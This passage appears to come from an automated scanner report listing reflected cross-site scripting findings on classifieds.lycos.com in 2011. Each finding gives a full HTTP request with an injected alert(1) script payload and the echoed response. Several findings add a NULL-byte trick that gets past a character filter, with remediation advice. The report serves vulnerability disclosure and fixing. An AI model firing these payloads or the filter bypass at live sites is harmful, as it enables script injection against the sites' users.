The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00434ac"><script>alert(1)</script>f0b202c5c34 was submitted in the REST URL parameter 2. This input was echoed as 434ac"><script>alert(1)</script>f0b202c5c34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sale-furniture/entertainment-center-7-x6-x17-in-2-sections-w-glass-doors-2416130146%00434ac"><script>alert(1)</script>f0b202c5c34 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:04:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:52 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-furniture/entertainment-center-7-x6-x17-in-2-sections-w-glass-doors-2416130146%00434ac"><script>alert(1)</script>f0b202c5c34?mobile=1" rel="nofollow">
...[SNIP]...

1.116. http://classifieds.lycos.com/sale-furniture/entertainment-center-7-x6-x17-in-2-sections-w-glass-doors-2416130146 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-furniture/entertainment-center-7-x6-x17-in-2-sections-w-glass-doors-2416130146

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34c37"><script>alert(1)</script>4e3fb0da995 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-furniture/entertainment-center-7-x6-x17-in-2-sections-w-glass-doors-2416130146?34c37"><script>alert(1)</script>4e3fb0da995=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:03:48 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:03:48 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=sale%2Ffurniture; path=/
Set-Cookie: classifieds[lastpage][0][name]=Furniture; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-furniture/entertainment-center-7-x6-x17-in-2-sections-w-glass-doors-2416130146?34c37"><script>alert(1)</script>4e3fb0da995=1&mobile=1" rel="nofollow">
...[SNIP]...

1.117. http://classifieds.lycos.com/sale-furniture/table-and-4-chairs-like-new-blonde-table-and-4-chairs-like-new-2416139818 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-furniture/table-and-4-chairs-like-new-blonde-table-and-4-chairs-like-new-2416139818

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc6bb"><script>alert(1)</script>fff7f43fb3b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-furniturecc6bb"><script>alert(1)</script>fff7f43fb3b/table-and-4-chairs-like-new-blonde-table-and-4-chairs-like-new-2416139818 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:04:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:17 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-furniturecc6bb"><script>alert(1)</script>fff7f43fb3b/table-and-4-chairs-like-new-blonde-table-and-4-chairs-like-new-2416139818?mobile=1" rel="nofollow">
...[SNIP]...

1.118. http://classifieds.lycos.com/sale-furniture/table-and-4-chairs-like-new-blonde-table-and-4-chairs-like-new-2416139818 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-furniture/table-and-4-chairs-like-new-blonde-table-and-4-chairs-like-new-2416139818

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d2aae"><script>alert(1)</script>bc97f7c991a was submitted in the REST URL parameter 2. This input was echoed as d2aae"><script>alert(1)</script>bc97f7c991a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sale-furniture/table-and-4-chairs-like-new-blonde-table-and-4-chairs-like-new-2416139818%00d2aae"><script>alert(1)</script>bc97f7c991a HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:04:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:54 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25736

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-furniture/table-and-4-chairs-like-new-blonde-table-and-4-chairs-like-new-2416139818%00d2aae"><script>alert(1)</script>bc97f7c991a?mobile=1" rel="nofollow">
...[SNIP]...

1.119. http://classifieds.lycos.com/sale-furniture/table-and-4-chairs-like-new-blonde-table-and-4-chairs-like-new-2416139818 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-furniture/table-and-4-chairs-like-new-blonde-table-and-4-chairs-like-new-2416139818

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ea7f"><script>alert(1)</script>c58e7734110 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-furniture/table-and-4-chairs-like-new-blonde-table-and-4-chairs-like-new-2416139818?5ea7f"><script>alert(1)</script>c58e7734110=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:03:53 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:03:53 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=sale%2Ffurniture; path=/
Set-Cookie: classifieds[lastpage][0][name]=Furniture; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-furniture/table-and-4-chairs-like-new-blonde-table-and-4-chairs-like-new-2416139818?5ea7f"><script>alert(1)</script>c58e7734110=1&mobile=1" rel="nofollow">
...[SNIP]...

1.120. http://classifieds.lycos.com/sale-home-appliance/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-home-appliance/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62d9c"><script>alert(1)</script>ed769d5666e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-home-appliance62d9c"><script>alert(1)</script>ed769d5666e/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:07:41 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:07:41 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-home-appliance62d9c"><script>alert(1)</script>ed769d5666e/?mobile=1" rel="nofollow">
...[SNIP]...

1.121. http://classifieds.lycos.com/sale-home-appliance/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-home-appliance/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4c2b"><script>alert(1)</script>2a3be374949 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-home-appliance/?d4c2b"><script>alert(1)</script>2a3be374949=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:07:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:07:05 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43512

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-home-appliance/?d4c2b"><script>alert(1)</script>2a3be374949=1&mobile=1" rel="nofollow">
...[SNIP]...

1.122. http://classifieds.lycos.com/sale-kid/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-kid/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ee25"><script>alert(1)</script>d5547f0ba09 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-kid3ee25"><script>alert(1)</script>d5547f0ba09/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:08:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:08:03 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-kid3ee25"><script>alert(1)</script>d5547f0ba09/?mobile=1" rel="nofollow">
...[SNIP]...

1.123. http://classifieds.lycos.com/sale-kid/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-kid/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bddce"><script>alert(1)</script>47aa7265f70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-kid/?bddce"><script>alert(1)</script>47aa7265f70=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:07:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:07:24 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-kid/?bddce"><script>alert(1)</script>47aa7265f70=1&mobile=1" rel="nofollow">
...[SNIP]...

1.124. http://classifieds.lycos.com/sale-music/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-music/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c58d"><script>alert(1)</script>c5b4c6e40fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-music1c58d"><script>alert(1)</script>c5b4c6e40fe/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:08:20 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:08:20 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-music1c58d"><script>alert(1)</script>c5b4c6e40fe/?mobile=1" rel="nofollow">
...[SNIP]...

1.125. http://classifieds.lycos.com/sale-music/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-music/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cd98"><script>alert(1)</script>6781372f1a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-music/?3cd98"><script>alert(1)</script>6781372f1a2=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:07:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:07:43 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41591

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-music/?3cd98"><script>alert(1)</script>6781372f1a2=1&mobile=1" rel="nofollow">
...[SNIP]...

1.126. http://classifieds.lycos.com/sale-pet-bird/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-bird/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dcb3"><script>alert(1)</script>447ff4bb05b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-bird6dcb3"><script>alert(1)</script>447ff4bb05b/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:12:21 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:12:21 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-bird6dcb3"><script>alert(1)</script>447ff4bb05b/?mobile=1" rel="nofollow">
...[SNIP]...

1.127. http://classifieds.lycos.com/sale-pet-bird/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-bird/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1ff4"><script>alert(1)</script>97fa90e91b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-bird/?a1ff4"><script>alert(1)</script>97fa90e91b3=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:11:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:52 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-bird/?a1ff4"><script>alert(1)</script>97fa90e91b3=1&mobile=1" rel="nofollow">
...[SNIP]...

1.128. http://classifieds.lycos.com/sale-pet-cat/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-cat/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ab5a"><script>alert(1)</script>9510e6a4e28 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-cat1ab5a"><script>alert(1)</script>9510e6a4e28/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:12:21 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:12:21 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-cat1ab5a"><script>alert(1)</script>9510e6a4e28/?mobile=1" rel="nofollow">
...[SNIP]...

1.129. http://classifieds.lycos.com/sale-pet-cat/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-cat/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae787"><script>alert(1)</script>ab025033532 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

